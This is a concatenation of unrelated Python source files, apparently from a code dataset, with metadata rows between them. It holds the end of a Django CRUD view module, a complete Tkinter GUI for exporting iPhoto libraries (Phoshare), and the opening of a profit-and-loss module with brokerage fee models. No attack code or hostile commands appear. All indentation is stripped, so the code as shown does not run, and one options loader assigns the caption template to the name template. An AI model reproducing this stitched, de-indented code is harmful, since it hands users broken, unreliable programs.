form_filter = config.form_filter_class(request.GET)
else:
form_filter = config.form_filter_class()
q = build_query(form_filter, 1)
paginator = Paginator(q, ITEMS_PER_PAGE)
try:
page_number = int(request.GET['page'])
except (KeyError, ValueError):
page_number = 1
if page_number < 1:
page_number = 1
elif page_number > paginator.num_pages:
page_number = paginator.num_pages
page = paginator.page(page_number)
objects = page.object_list
return my_render(request, config.template_dir + 'index.html', {
'form_filters': form_filter,
'objects': objects,
'paginator': paginator,
'page': page,
'page_number': page_number,
'pages_range': range(1, paginator.num_pages + 1),
'next_page': page_number + 1,
'prev_page': page_number - 1
})
def build_query(filters, page):
"""
Construye el query de búsqueda a partir de los filtros.
"""
return filters.buildQuery()
@credential_required('seg_backend')
def create(request, crud_name):
config = cruds[crud_name]
if request.method == 'POST':
form = config.form_class(request.POST)
if form.is_valid():
obj = form.save()
request.set_flash('success', 'Datos guardados correctamente.')
# redirigir a edit
return HttpResponseRedirect(reverse('crudEdit', args=[crud_name, obj.id]))
else:
request.set_flash('warning', 'Ocurrió un error guardando los datos.')
else:
form = config.form_class()
return my_render(request, config.template_dir + 'new.html', {
'form': form,
'is_new': True,
})
@credential_required('seg_backend')
def edit(request, crud_name, obj_id):
config = cruds[crud_name]
obj = config.model_class.objects.get(pk=obj_id)
if request.method == 'POST':
form = config.form_class(request.POST, instance=obj)
if form.is_valid():
obj = form.save()
request.set_flash('success', 'Datos actualizados correctamente.')
else:
request.set_flash('warning', 'Ocurrió un error actualizando los datos.')
else:
form = config.form_class(instance=obj)
return my_render(request, config.template_dir + 'edit.html', {
'form': form,
'obj': obj,
})
@credential_required('seg_backend')
def delete(request, crud_name, obj_id):
config = cruds[crud_name]
obj = config.model_class.objects.get(pk=obj_id)
try:
obj.delete()
request.set_flash('success', 'Registro eliminado correctamente.')
except Exception as e:
print e
request.set_flash('warning', 'No se puede eliminar el elemento porque está en uso.')
return HttpResponseRedirect(reverse('crudList', args=[crud_name]))
| bsd-3-clause | 6,436,716,297,905,079,000 | 41.365385 | 175 | 0.761991 | false | 3.055479 | true | false | false |
nagyistoce/phoshare | phoshare/phoshare_ui.py | 6 | 41112 | """Reads iPhoto library info, and exports photos and movies. GUI version."""
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cStringIO
import logging
import os
import platform
import threading
import tkFileDialog
import tkMessageBox
import traceback
# pylint: disable-msg=W0614
from Tkinter import * #IGNORE:W0401
from ttk import *
import appledata.iphotodata as iphotodata
import phoshare.phoshare_main as phoshare_main
import phoshare.phoshare_version as phoshare_version
import tilutil.exiftool as exiftool
import tilutil.systemutils as su
from ScrolledText import ScrolledText
import ConfigParser
import Queue
_CONFIG_PATH = su.expand_home_folder('~/Library/Application Support/Google/'
'Phoshare/phoshare.cfg')
_BOLD_FONT = ('helvetica', 12, 'bold')
_logger = logging.getLogger('google')
def _int_from_bool(boolean_value):
"""Converts a boolean value to an integer of 0 or 1."""
if boolean_value:
return 1
return 0
class HelpDialog(Toplevel):
"""Displays a help dialog, using a scrolled text area."""
def __init__(self, parent, text, title="Phoshare Help"):
Toplevel.__init__(self, parent)
self.transient(parent)
self.title(title)
self.parent = parent
t = ScrolledText(self)
t.insert(END, text)
t.config(state=DISABLED)
t.pack()
class ExportApp(Frame):
"""GUI version of the Phoshare tool."""
def __init__(self, master=None):
"""Initialize the app, setting up the UI."""
Frame.__init__(self, master, padding=10)
top = self.winfo_toplevel()
menu_bar = Menu(top)
top["menu"] = menu_bar
apple = Menu(menu_bar, name='apple')
menu_bar.add_cascade(label='Phoshare', menu=apple)
apple.add_command(label="About Phoshare", command=self.__aboutHandler)
sub_menu = Menu(menu_bar, name='help')
menu_bar.add_cascade(label="Help", menu=sub_menu)
sub_menu.add_command(label="Phoshare Help", command=self.help_buttons)
self.thread_queue = Queue.Queue(maxsize=100)
self.active_library = None
top.columnconfigure(0, weight=1)
top.rowconfigure(0, weight=1)
self.grid(sticky=N+S+E+W)
self.valid_library = False
self.exiftool = False
self.iphoto_library = StringVar()
self.iphoto_library_status = StringVar()
self.browse_library_button = None
self.export_folder = StringVar()
self.library_status = None
self.dryrun_button = None
self.export_button = None
self.text = None
self.events = StringVar()
self.albums = StringVar()
self.smarts = StringVar()
self.foldertemplate = StringVar()
self.nametemplate = StringVar()
self.captiontemplate = StringVar()
self.update_var = IntVar()
self.delete_var = IntVar()
self.originals_var = IntVar()
self.link_var = IntVar()
self.folder_hints_var = IntVar()
self.faces_box = None
self.faces_var = IntVar()
self.face_keywords_box = None
self.face_keywords_var = IntVar()
self.face_albums_var = IntVar()
self.face_albums_text = StringVar()
self.iptc_box = None
self.iptc_all_box = None
self.iptc_var = IntVar()
self.iptc_all_var = IntVar()
self.gps_box = None
self.gps_var = IntVar()
self.verbose_var = IntVar()
self.info_icon = PhotoImage(file="info-b16.gif")
self.create_widgets()
# Set up logging so it gets redirected to the text area in the app.
self.logging_handler = logging.StreamHandler(self)
self.logging_handler.setLevel(logging.WARN)
_logger.addHandler(self.logging_handler)
def __aboutHandler(self):
HelpDialog(self, """%s %s
Copyright 2010 Google Inc.
http://code.google.com/p/phoshare""" % (phoshare_version.PHOSHARE_VERSION,
phoshare_version.PHOSHARE_BUILD),
title="About Phoshare")
def init(self):
"""Initializes processing by launching background thread checker and
initial iPhoto library check."""
self.thread_checker()
if exiftool.check_exif_tool(sys.stdout):
self.exiftool = True
self.faces_box.configure(state=NORMAL)
self.face_keywords_box.configure(state=NORMAL)
self.iptc_box.configure(state=NORMAL)
self.iptc_all_box.configure(state=NORMAL)
self.gps_box.configure(state=NORMAL)
options = self.Options()
options.load()
self.init_from_options(options)
self.check_iphoto_library()
def init_from_options(self, options):
"""Populates the UI from options."""
self.iphoto_library.set(options.iphoto)
self.export_folder.set(options.export)
self.albums.set(su.fsdec(options.albums))
self.events.set(su.fsdec(options.events))
self.smarts.set(su.fsdec(options.smarts))
self.foldertemplate.set(su.unicode_string(options.foldertemplate))
self.nametemplate.set(su.unicode_string(options.nametemplate))
self.captiontemplate.set(su.unicode_string(options.captiontemplate))
self.update_var.set(_int_from_bool(options.update))
self.delete_var.set(_int_from_bool(options.delete))
self.originals_var.set(_int_from_bool(options.originals))
self.link_var.set(_int_from_bool(options.link))
self.folder_hints_var.set(_int_from_bool(options.folderhints))
self.faces_var.set(_int_from_bool(options.faces) and self.exiftool)
self.face_keywords_var.set(_int_from_bool(options.face_keywords) and
self.exiftool)
self.face_albums_var.set(_int_from_bool(options.facealbums))
self.face_albums_text.set(options.facealbum_prefix)
if options.iptc and self.exiftool:
self.iptc_var.set(1)
if options.iptc == 2:
self.iptc_all_var.set(1)
self.gps_var.set(_int_from_bool(options.gps) and self.exiftool)
def _add_section(self, container, text, help_command):
"""Adds a new UI section with a bold label and an info button.
Args:
container: UI element that will contain this new item
row: row number in grid. Uses two rows.
text: label frame text.
help_command: command to run when the info button is pressed.
Returns: tuple of new section and content frames.
"""
section_frame = Frame(container)
section_frame.columnconfigure(0, weight=1)
label = Label(section_frame, text=text)
label.config(font=_BOLD_FONT)
label.grid(row=0, column=0, sticky=W, pady=5)
Button(section_frame, image=self.info_icon,
command=help_command).grid(row=0, column=1, sticky=E)
content_frame = Frame(section_frame)
content_frame.grid(row= 1, column=0, columnspan=2, sticky=N+S+E+W, pady=5)
return (section_frame, content_frame)
def _create_button_bar(self, container, row):
"""Creates the button bar with the Dry Run and Export buttons.
Args:
row: row number in grid.
Returns: next row number in grid.
"""
button_bar = Frame(container)
button_bar.grid(row=row, column=0, sticky=E+W, padx=10)
button_bar.columnconfigure(0, weight=1)
verbose_box = Checkbutton(button_bar, text="Show debug output", var=self.verbose_var)
verbose_box.grid(row=0, column=0, sticky=E)
self.dryrun_button = Button(button_bar, text="Dry Run",
command=self.do_dryrun, state=DISABLED)
self.dryrun_button.grid(row=0, column=1, sticky=E, pady=5)
self.export_button = Button(button_bar, text="Export",
command=self.do_export, state=DISABLED)
self.export_button.grid(row=0, column=2, pady=5)
return row + 1
def _create_library_tab(self, library_tab):
library_tab.columnconfigure(0, weight=1)
row = 0
f = Frame(library_tab)
f.grid(row=row, columnspan=2, stick=E+W, padx=5, pady=5)
row += 1
f.columnconfigure(1, weight=1)
Label(f, text="iPhoto Library:").grid(sticky=E)
iphoto_library_entry = Entry(f, textvariable=self.iphoto_library)
iphoto_library_entry.grid(row=0, column=1, sticky=E+W)
self.browse_library_button = Button(f, text="Browse...",
command=self.browse_library)
self.browse_library_button.grid(row=0, column=2)
self.library_status = Label(f, textvariable=self.iphoto_library_status)
self.library_status.grid(row=1, column=1, sticky=W)
(cf, lf) = self._add_section(library_tab, "Events, Albums and Smart Albums",
self.help_events)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
lf.columnconfigure(1, weight=1)
Label(lf, text="Events:").grid(sticky=E)
events_entry = Entry(lf, textvariable=self.events)
events_entry.grid(row=0, column=1, sticky=EW)
Label(lf, text="Albums:").grid(sticky=E)
albums_entry = Entry(lf, textvariable=self.albums)
albums_entry.grid(row=1, column=1, sticky=EW)
Label(lf, text="Smart Albums:").grid(sticky=E)
smarts_entry = Entry(lf, textvariable=self.smarts)
smarts_entry.grid(row=2, column=1, columnspan=3, sticky=EW)
def _create_files_tab(self, files_tab):
files_tab.columnconfigure(0, weight=1)
# Export folder and options
row = 0
(cf, lf) = self._add_section(files_tab, "Export Folder and Options", self.help_export)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
lf.columnconfigure(1, weight=1)
label = Label(lf, text="Export Folder:")
label.grid(sticky=E)
export_folder_entry = Entry(lf, textvariable=self.export_folder)
export_folder_entry.grid(row=0, column=1, columnspan=2, sticky=E+W)
Button(lf, text="Browse...",
command=self.browse_export).grid(row=0, column=3)
update_box = Checkbutton(lf, text="Overwrite changed pictures",
var=self.update_var)
update_box.grid(row=1, column=1, sticky=W)
originals_box = Checkbutton(lf, text="Export originals",
var=self.originals_var)
originals_box.grid(row=2, column=1, sticky=W)
hint_box = Checkbutton(lf, text="Use folder hints",
var=self.folder_hints_var)
hint_box.grid(row=3, column=1, sticky=W)
delete_box = Checkbutton(lf, text="Delete obsolete pictures",
var=self.delete_var)
delete_box.grid(row=4, column=1, sticky=W)
link_box = Checkbutton(lf, text="Use file links", var=self.link_var)
link_box.grid(row=5, column=1, sticky=W)
# Templates ----------------------------------------
(cf, lf) = self._add_section(files_tab, "Name Templates", self.help_templates)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
lf.columnconfigure(1, weight=1)
Label(lf, text="Folder names:").grid(sticky=E)
foldertemplate_entry = Entry(lf, textvariable=self.foldertemplate)
foldertemplate_entry.grid(row=0, column=1, sticky=EW)
Label(lf, text="File names:").grid(sticky=E)
nametemplate_entry = Entry(lf, textvariable=self.nametemplate)
nametemplate_entry.grid(row=1, column=1, sticky=EW)
Label(lf, text="Captions:").grid(sticky=E)
captiontemplate_entry = Entry(lf, textvariable=self.captiontemplate)
captiontemplate_entry.grid(row=2, column=1, sticky=EW)
def _create_metadata_tab(self, metadata_tab):
metadata_tab.columnconfigure(0, weight=1)
row = 0
# Metadata --------------------------------------------
(cf, lf) = self._add_section(metadata_tab, "Metadata", self.help_metadata)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
self.iptc_box = Checkbutton(lf,
text=("Export metadata (descriptions, "
"keywords, ratings, dates)"),
var=self.iptc_var, state=DISABLED,
command=self.change_iptc_box)
self.iptc_box.grid(row=0, column=0, columnspan=2, sticky=W)
self.iptc_all_box = Checkbutton(lf,
text="Check previously exported images",
var=self.iptc_all_var,
command=self.change_metadata_box,
state=DISABLED)
self.iptc_all_box.grid(row=1, column=0, sticky=W)
self.gps_box = Checkbutton(lf,
text="Export GPS data",
var=self.gps_var,
command=self.change_metadata_box,
state=DISABLED)
self.gps_box.grid(row=2, column=0, sticky=W)
# Faces ---------------------------------------------------
(cf, lf) = self._add_section(metadata_tab, "Faces", self.help_faces)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
lf.columnconfigure(2, weight=1)
self.faces_box = Checkbutton(lf, text="Copy faces into metadata",
var=self.faces_var, state=DISABLED,
command=self.change_metadata_box)
self.faces_box.grid(row=0, column=0, sticky=W)
self.face_keywords_box = Checkbutton(
lf,
text="Copy face names into keywords",
var=self.face_keywords_var,
command=self.change_metadata_box,
state=DISABLED)
self.face_keywords_box.grid(row=1, column=0, sticky=W)
checkbutton = Checkbutton(lf, text="Export faces into folders",
var=self.face_albums_var)
checkbutton.grid(row=2, column=0, sticky=W)
label = Label(lf, text="Faces folder prefix:")
label.grid(row=2, column=1, sticky=E)
entry = Entry(lf, textvariable=self.face_albums_text)
entry.grid(row=2, column=2, sticky=E+W)
def create_widgets(self):
"""Builds the UI."""
self.columnconfigure(0, weight=1)
n = Notebook(self)
n.grid(row=0, sticky=E+W+N+S)
library_tab = Frame(n)
n.add(library_tab, text='Library')
self._create_library_tab(library_tab)
files_tab = Frame(n)
n.add(files_tab, text='Files')
self._create_files_tab(files_tab)
metadata_tab = Frame(n)
n.add(metadata_tab, text='Metadata')
self._create_metadata_tab(metadata_tab)
self._create_button_bar(self, 1)
self.text = ScrolledText(self, borderwidth=4, relief=RIDGE, padx=4,
pady=4)
self.text.grid(row=2, column=0, sticky=E+W+N+S)
self.rowconfigure(2, weight=1)
def change_iptc_box(self):
"""Clears some options that depend on the metadata export option."""
mode = self.iptc_var.get()
if not mode:
self.faces_var.set(0)
self.face_keywords_var.set(0)
self.iptc_all_var.set(0)
self.gps_var.set(0)
def change_metadata_box(self):
"""Sets connected options if an option that needs meta data is changed.
"""
mode = (self.faces_var.get() or self.face_keywords_var.get() or
self.iptc_all_var.get() or self.gps_var.get())
if mode:
self.iptc_var.set(1)
def help_events(self):
HelpDialog(self, """Events, Albums and Smart Albums
Selects which events, albums, or smart albums to export.
Each field is a regular expression, and at least one must be filled in.
Matches are done against the beginning of the event or album name. An
entry in Events of
Family
will export all events that start with "Family", including "Family 2008"
and "Family 2009". "|" separates alternate patterns, so
Family|Travel
will export all events that start with either "Family" or "Travel".
"." matches any character, and therefore,
.
will export all events. To export all events with "2008" in the name, use
.*2008
For more details on regular expressions, see
http://en.wikipedia.org/wiki/Regular_expression""")
def help_templates(self):
HelpDialog(self, """Folder, file, and image caption templates.
Templates are strings with place holders for values. The place holders have
the format "{name}". Everything else in the template will be copied. Examples:
{title}
{yyyy}/{mm}/{dd} {title} - generates "2010/12/31 My Birthday" if the date
of the pictures is Dec 31, 2010, and the title is "My Birthday".
{yyyy} Event: {event} - generates "2010 Event: Birthday" for an event with
any date in 2010 and the name "Birthday".
Available place holders for folder names:
{name} - name of the album or event.
{hint} - folder hint (taken from line event or album description starting with
@).
{yyyy} - year of album or event date.
{mm} - month of album or event date.
{dd} - date of album or event date.
Available place holders for file names:
{album} - name of album (or in the case of an event, the name of the event).
{index} - number of image in album, starting at 1.
{index0} - number of image in album, padded with 0s, so that all numbers have
the same length.
{event} - name of the event. In the case of an album, the name of the event
to which the image belongs.
{event_index} - number of image in the event, starting at 1. If the case of an
album, this number will be based on the event to which the
image belongs.
{event_index0} - same as {event_index}, but padded with leading 0s so that all
values have the same length.
{title} - image title.
{yyyy} - year of image.
{mm} - month of image (01 - 12).
{dd} - day of image (01 - 31).
If you are using {album}/{index}/{index0} place holders, the image will be
named based on whatever album or event it is contained. That means an image
in two albums will be exported with different names, even so the files are
identical. If you want to use the same name for each image, regardless of
which album it is in, use {event}, {event_index}, and {event_index0} instead.
Available place holders for captions:
{title} - image title.
{description} - image description.
{title_description} - concatenated image title and description, separated by a
: if both are set.
{yyyy} - year of image.
{mm} - month of image (01 - 12).
{dd} - day of image (01 - 31).
""")
def help_buttons(self):
HelpDialog(self, """Export modes.
Click on "Dry Run" to see what Phoshare would do without actually modifying any
files.
Click on "Export" to export your files using the current settings.
All your settings will be saved when you click either Dry Run and Export, and
re-loaded if you restart Phoshare.
Check "Show debug output" to generate additional output message that can assist
in debugging Phoshare problems.
""")
def help_export(self):
HelpDialog(self, """Export Settings
Export Folder: path to the folder for exporting images.
Overwrite changed pictures: If set, pictures that already exist in the export
folder will be overriden if an different version
exist in iPhoto. Any edits made to previously
exported images in the export folder will be lost!
Use Dry Run to see which files would be overwritten.
Export originals: If set, and an image has been modified in iPhoto, both the
original and the edited version will be exported. The original
will be stored in a sub-folder called "Originals".
Use folder hints: By default, each exported event or album will become a folder
in the export folder. With folder hints, a sub-folder name can
be given in the event or album description by adding a line
starting with a @ character. Example:
Family Vacation
@Vacation
would export all images in that event into a sub-folder called
"Vacation".
Delete obsolete pictures: If set, any image, movie file or folder in the export
folder that does not exist in the iPhoto library will
be deleted. Use Dry Run to see which files would be
deleted.
Use file links: Don't copy images during export, but make a link to the files
in the iPhoto library instead. This option is only available
if the export folder is on the same drive as the iPhoto library.
This option will save a lot of disk space because it avoids
making copies of all your images and videos. Using this option
causes the metadata of the images IN YOUR IPHOTO LIBRARY to be
modified. While phoshare should not cause any problems to your
images, it is best to use this option only if you have a backup
of your iPhoto library, and you know how to restore your library
from the backup. For more details on link mode, see
https://sites.google.com/site/phosharedoc/Home#TOC-link-mode""")
def help_faces(self):
HelpDialog(self, """Faces options.
Copy faces into metadata: faces tags and face regions will be copied into the
image metadata using the Microsoft Photo Region
Schema:
http://msdn.microsoft.com/en-us/library/ee719905(VS.85).aspx
Copy faces names into keywords: If set, face names will be merged into image
keywords. Requires "Export metadata" checked.
Export faces into folders: If checked, folders will be created for each face
tag, each containing all the images tagged with
that person.
Faces folder prefix: If set, the string will be used as a prefix for the
face export folders if "Exported faces into folders"
is checked. This can be just a value like "Face: ", or
a sub-folder name like "Faces/" if it ends with a "/"
Metadata options will be disabled if exiftool is not available.
""")
def help_metadata(self):
HelpDialog(self, """Metadata options.
Export metadata: sets the description, keywords, rating and date metadata in the
exported images to match the iPhoto settings.
Check previously exported images: If not checked, metadata will only be set for new or
updated images. If checked, metadata will be checked in
all images, including ones that were previously
exported. This is much slower.
Export GPS data: export the GPS coordinates into the image metadata.
Metadata options will be disabled if exiftool is not available.""")
def check_iphoto_library(self):
self.valid_library = False
self.enable_buttons()
self.iphoto_library_status.set("Checking library location...")
self.launch_export("library")
def set_library_status(self, good, message):
if good:
self.valid_library = True
self.enable_buttons()
self.iphoto_library_status.set(message)
def write_progress(self, text):
self.text.insert(END, text)
self.text.see(END)
def enable_buttons(self):
if self.valid_library:
self.dryrun_button.config(state=NORMAL)
self.export_button.config(state=NORMAL)
else:
self.dryrun_button.config(state=DISABLED)
self.export_button.config(state=DISABLED)
self.browse_library_button.config(state=NORMAL)
def browse_library(self):
path = tkFileDialog.askopenfilename(title="Locate iPhoto Library")
self.iphoto_library.set(path)
self.check_iphoto_library()
def browse_export(self):
path = tkFileDialog.askdirectory(title="Locate Export Folder")
self.export_folder.set(path)
def do_export(self):
if self.active_library:
self.stop_thread()
return
if not self.can_export():
return
self.export_button.config(text="Stop Export")
self.dryrun_button.config(state=DISABLED)
self.run_export(False)
def do_dryrun(self):
if self.active_library:
self.stop_thread()
return
if not self.can_export():
return
self.dryrun_button.config(text="Stop Dry Run")
self.export_button.config(state=DISABLED)
self.run_export(True)
def stop_thread(self):
if self.active_library:
self.active_library.abort()
def export_done(self):
self.active_library = None
self.dryrun_button.config(text="Dry Run")
self.export_button.config(text="Export")
self.enable_buttons()
class Options(object):
"""Simple helper to create an object compatible with the OptionParser
output in Phoshare.py."""
def __init__(self):
self.iphoto = '~/Pictures/iPhoto Library'
self.export = '~/Pictures/Album'
self.albums = ''
self.events = '.'
self.smarts = ''
self.ignore = []
self.delete = False
self.update = False
self.link = False
self.dryrun = False
self.folderhints = False
self.captiontemplate = u'{description}'
self.foldertemplate = u'{name}'
self.nametemplate = u'{title}'
self.aperture = False # TODO
self.size = '' # TODO
self.picasa = False # TODO
self.movies = True # TODO
self.originals = False
self.iptc = 0
self.gps = False
self.faces = False
self.facealbums = False
self.facealbum_prefix = ''
self.face_keywords = False
self.verbose = False
def load(self):
"""Attempts to load saved options. Returns True if saved options
were available."""
if not os.path.exists(_CONFIG_PATH):
return False
config = ConfigParser.SafeConfigParser()
config.read(_CONFIG_PATH)
s = 'Export1'
if config.has_option(s, 'iphoto'):
self.iphoto = config.get(s, 'iphoto')
if config.has_option(s, 'export'):
self.export = config.get(s, 'export')
if config.has_option(s, 'albums'):
self.albums = config.get(s, 'albums')
if config.has_option(s, 'events'):
self.events = config.get(s, 'events')
if config.has_option(s, 'smarts'):
self.smarts = config.get(s, 'smarts')
if config.has_option(s, 'foldertemplate'):
self.foldertemplate = config.get(s, 'foldertemplate')
if config.has_option(s, 'nametemplate'):
self.nametemplate = config.get(s, 'nametemplate')
if config.has_option(s, 'captiontemplate'):
self.captiontemplate = config.get(s, 'captiontemplate')
if config.has_option(s, 'delete'):
self.delete = config.getboolean(s, 'delete')
if config.has_option(s, 'update'):
self.update = config.getboolean(s, 'update')
if config.has_option(s, 'link'):
self.link = config.getboolean(s, 'link')
if config.has_option(s, 'folderhints'):
self.folderhints = config.getboolean(s, 'folderhints')
if config.has_option(s, 'captiontemplate'):
self.nametemplate = unicode(config.get(s, 'captiontemplate'))
if config.has_option(s, 'nametemplate'):
self.nametemplate = unicode(config.get(s, 'nametemplate'))
if config.has_option(s, 'size'):
self.size = config.get(s, 'size')
if config.has_option(s, 'picasa'):
self.picasa = config.getboolean(s, 'picasa')
if config.has_option(s, 'movies'):
self.movies = config.getboolean(s, 'movies')
if config.has_option(s, 'originals'):
self.originals = config.getboolean(s, 'originals')
if config.has_option(s, 'iptc'):
self.iptc = config.getint(s, 'iptc')
if config.has_option(s, 'gps'):
self.gps = config.getboolean(s, 'gps')
if config.has_option(s, 'faces'):
self.faces = config.getboolean(s, 'faces')
if config.has_option(s, 'facealbums'):
self.facealbums = config.getboolean(s, 'facealbums')
if config.has_option(s, 'facealbum_prefix'):
self.facealbum_prefix = config.get(s, 'facealbum_prefix')
if config.has_option(s, 'face_keywords'):
self.face_keywords = config.getboolean(s, 'face_keywords')
return True
def save(self):
"""Saves the current options into a file."""
config = ConfigParser.RawConfigParser()
s = 'Export1'
config.add_section(s)
config.set(s, 'iphoto', self.iphoto)
config.set(s, 'export', self.export)
config.set(s, 'albums', su.fsenc(self.albums))
config.set(s, 'events', su.fsenc(self.events))
config.set(s, 'smarts', su.fsenc(self.smarts))
config.set(s, 'foldertemplate', su.fsenc(self.foldertemplate))
config.set(s, 'nametemplate', su.fsenc(self.nametemplate))
config.set(s, 'captiontemplate', su.fsenc(self.captiontemplate))
config.set(s, 'delete', self.delete)
config.set(s, 'update', self.update)
config.set(s, 'link', self.link)
config.set(s, 'dryrun', self.dryrun)
config.set(s, 'folderhints', self.folderhints)
config.set(s, 'captiontemplate', self.captiontemplate)
config.set(s, 'nametemplate', self.nametemplate)
config.set(s, 'size', self.size)
config.set(s, 'picasa', self.picasa)
config.set(s, 'movies', self.movies)
config.set(s, 'originals', self.originals)
config.set(s, 'iptc', self.iptc)
config.set(s, 'gps', self.gps)
config.set(s, 'faces', self.faces)
config.set(s, 'facealbums', self.facealbums)
config.set(s, 'facealbum_prefix', self.facealbum_prefix)
config.set(s, 'face_keywords', self.face_keywords)
config_folder = os.path.split(_CONFIG_PATH)[0]
if not os.path.exists(config_folder):
os.makedirs(config_folder)
configfile = open(_CONFIG_PATH, 'wb')
config.write(configfile)
configfile.close()
def can_export(self):
if (not self.albums.get() and not self.events.get() and
not self.smarts.get()):
tkMessageBox.showerror(
"Export Error",
("Need to specify at least one event, album, or smart album "
"for exporting."))
return False
return True
def run_export(self, dry_run):
mode = "export"
if dry_run:
mode = "dry_run"
self.launch_export(mode)
def launch_export(self, mode):
"""Launch an export operation in a new thread, to not block the UI.
Args:
mode - name of operation to run, "library", "dry_run", or "export".
"""
self.text.delete('1.0', END)
self.browse_library_button.config(state=DISABLED)
export_thread = threading.Thread(target=self.export_thread,
args=(mode,))
export_thread.start()
def export_thread(self, mode):
"""Run an export operation in a thread, to not block the UI.
Args:
mode - name of operation to run, "library", "dry_run", or "export".
"""
try:
# First, load the iPhoto library.
library_path = su.expand_home_folder(self.iphoto_library.get())
album_xml_file = iphotodata.get_album_xmlfile(library_path)
data = iphotodata.get_iphoto_data(album_xml_file)
msg = "Version %s library with %d images" % (
data.applicationVersion, len(data.images))
self.write(msg + '\n')
if mode == "library":
# If we just need to check the library, we are done here.
self.thread_queue.put(("done", (True, mode, msg)))
return
# Do the actual export.
export_folder = su.expand_home_folder(self.export_folder.get())
args = ['Phoshare.py', '--export', '"' + export_folder + '"']
options = self.Options()
options.iphoto = self.iphoto_library.get()
args.extend(['--iphoto', '"' + options.iphoto + '"'])
options.export = self.export_folder.get()
options.dryrun = mode == "dry_run"
options.albums = self.albums.get()
if options.albums:
args.extend(['--albums', '"' + options.albums + '"'])
options.events = self.events.get()
if options.events:
args.extend(['--events', '"' + options.events + '"'])
options.smarts = self.smarts.get()
if options.smarts:
args.extend(['--smarts', '"' + options.smarts + '"'])
options.foldertemplate = unicode(self.foldertemplate.get())
if options.foldertemplate:
args.extend(['--foldertemplate', '"' +
options.foldertemplate + '"'])
options.nametemplate = unicode(self.nametemplate.get())
if options.nametemplate:
args.extend(['--nametemplate', '"' +
options.nametemplate + '"'])
options.captiontemplate = unicode(self.captiontemplate.get())
if options.captiontemplate:
args.extend(['--captiontemplate', '"' +
options.captiontemplate + '"'])
options.ignore = [] # TODO
options.update = self.update_var.get() == 1
if options.update:
args.append('--update')
options.delete = self.delete_var.get() == 1
if options.delete:
args.append('--delete')
options.originals = self.originals_var.get() == 1
if options.originals:
args.append('--originals')
options.link = self.link_var.get() == 1
if options.link:
args.append('--link')
options.folderhints = self.folder_hints_var.get() == 1
if options.folderhints:
args.append('--folderhints')
options.faces = self.faces_var.get() == 1
if options.faces:
args.append('--faces')
options.face_keywords = self.face_keywords_var.get() == 1
if options.face_keywords:
args.append('--face_keywords')
if self.iptc_all_var.get() == 1:
options.iptc = 2
args.append('--iptcall')
elif self.iptc_var.get() == 1:
options.iptc = 1
args.append('--iptc')
else:
options.iptc = 0
options.gps = self.gps_var.get()
if options.gps:
args.append('--gps')
options.facealbums = self.face_albums_var.get() == 1
if options.facealbums:
args.append('--facealbums')
options.facealbum_prefix = self.face_albums_text.get()
if options.facealbum_prefix:
args.append('--facealbum_prefix')
exclude = None # TODO
options.save()
print " ".join(args)
self.logging_handler.setLevel(logging.DEBUG if self.verbose_var.get() else logging.INFO)
self.active_library = phoshare_main.ExportLibrary(export_folder)
phoshare_main.export_iphoto(self.active_library, data, exclude,
options)
self.thread_queue.put(("done", (True, mode, '')))
except Exception, e: # IGNORE:W0703
self.thread_queue.put(("done",
(False, mode,
str(e) + '\n\n' + traceback.format_exc())))
def thread_checker(self, delay_ms=100): # 10x per second
"""Processes any queued up messages in the thread queue. Once the queue
is empty, schedules another check after a short delay.
This method runs in the main thread, and therefore, can update the UI.
"""
writes = 0
while True:
try:
(callback, args) = self.thread_queue.get(block=False)
if callback == "write":
self.write_progress(args)
writes += 1
if writes >= 10:
# After 10 consecutive writes to the progress area,
# update the UI so that the user can see the progress.
self.update()
writes = 0
continue
# Must be a "done" message, with a (success, mode, msg)
# argument.
success = args[0]
mode = args[1]
msg = args[2]
if success:
self.write_progress("Done!")
else:
self.write_progress("Error: " + msg)
if mode == "library":
self.set_library_status(success, msg)
else:
self.export_done()
except Queue.Empty:
break
# Check the queue again after a short delay.
self.after(delay_ms, self.thread_checker)
def write(self, text):
"""Writes text to the progress area of the UI. Uses the thread queue,
and can be called from a non-UI thread."""
self.thread_queue.put(("write", text))
def writelines(self, lines): # lines already have '\n'
"""Writes text to the progress area of the UI. Uses the thread queue,
and can be called from a non-UI thread."""
for line in lines:
self.write(line)
def main():
"""Main routine for phoshare_ui. Typically launched from Phoshare.py"""
app = ExportApp()
app.master.title(phoshare_version.PHOSHARE_VERSION)
sys.stdout = app
try:
app.init()
app.mainloop()
except Exception, e:
f = cStringIO.StringIO()
traceback.print_exc(file=f)
app.write_progress('--- Fatal Error ---\n')
app.write_progress('Please include the information below in your bug'
' report.\n\n')
app.write_progress('%s\n\n%s\n' % (str(e), f.getvalue()))
app.write_progress('\n'.join(os.uname()))
app.write_progress('\nMac version: %s\n' % (platform.mac_ver()[0]))
app.write_progress('Python version: %s\n' % (platform.python_version()))
tkMessageBox.showerror(
'Phoshare Error',
'Phoshare encountered a serious problem and will shut down. '
'Please copy the information shown in the application output panel '
'when reporting this problem at\n'
'http://code.google.com/p/phoshare/issues/entry\n\n%s.' % (str(e)))
raise e
if __name__ == "__main__":
main()
| apache-2.0 | -2,774,218,249,301,504,500 | 40.653495 | 100 | 0.581509 | false | 3.946247 | true | false | false |
chris-ch/omarket | python-lab/src/pnl.py | 1 | 2606 | import logging
import math
import numpy
class ZeroFeeModel(object):
def compute_fees(self, quantity, price):
return 0.
class InteractiveBrokersStockUSFeeModel(object):
def compute_fees(self, quantity, price):
max_fees = quantity * price * 0.5 / 100
return max(min(max_fees, 0.005 * quantity), 1.)
class AverageCostProfitAndLoss(object):
"""
Computes P&L based on weighted average cost method.
"""
def __init__(self, quantity=0, cost=0., realized_pnl=0):
self._quantity = quantity
self._cost = cost
self._realized_pnl = realized_pnl
self.fee_model = InteractiveBrokersStockUSFeeModel()
@property
def realized_pnl(self):
return self._realized_pnl
@property
def acquisition_cost(self):
return self._cost
@property
def quantity(self):
return self._quantity
